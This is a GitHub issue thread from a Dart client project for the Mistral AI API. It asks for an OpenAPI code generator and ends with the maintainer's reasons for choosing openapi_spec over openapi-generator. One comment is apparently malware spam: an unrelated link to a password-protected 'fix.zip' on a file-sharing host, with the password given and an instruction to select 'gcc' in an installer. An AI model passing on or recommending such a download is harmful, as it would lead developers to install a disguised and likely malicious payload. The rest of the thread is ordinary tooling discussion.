### ISSUE TITLE
feat: Find OpenAPI client generator for dart

### ISSUE THREAD

**Issue by gawi151** [nomtek/mistralai_client_dart#64]
**Is your feature request related to a problem? Please describe.**
Generate dart api client from OpenAPI spec.

**Describe the solution you'd like**
Tool that will generate most of the code for our client. Ideally should support Dart 3 + OpenAPI 3.1

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gawi151** [comment]
So in the process of looking for open api generator I looked at:
- https://github.com/OpenAPITools/openapi-generator
- https://github.com/tazatechnology/openapi_spec

As a result of the research I decided to go with:
- https://github.com/tazatechnology/openapi_spec

Why:
- the `openapi-generator` has 2 types of Dart generators and both are quite dated
  - It's pure dart generator is using old Dart 2 (not too much support for modern dart 3)
  - dio + built_value generator is quite verbose when creating objects for API request - checkout [built_value example](https://github.com/google/built_value.dart/blob/master/chat_example/lib/client/client.dart) 
  - generator itself is written in Java
  - generator is not supporting OpenAPI 3.1 too well (a lot of issues in the repo + dart generators are much more behind than more popular languages generators)
- `openapi_spec` is much newer
  - Written in Dart - easier to modify it for Flutter/Dart developer
  - Also, doesn't support OpenAPI 3.1 well but it's easier to add required support. I created a [fork](https://github.com/gawi151/openapi_spec) so our code generation can use it
  - uses `freezed` under the hood to create models (it's much more common nowadays than `built_value`)
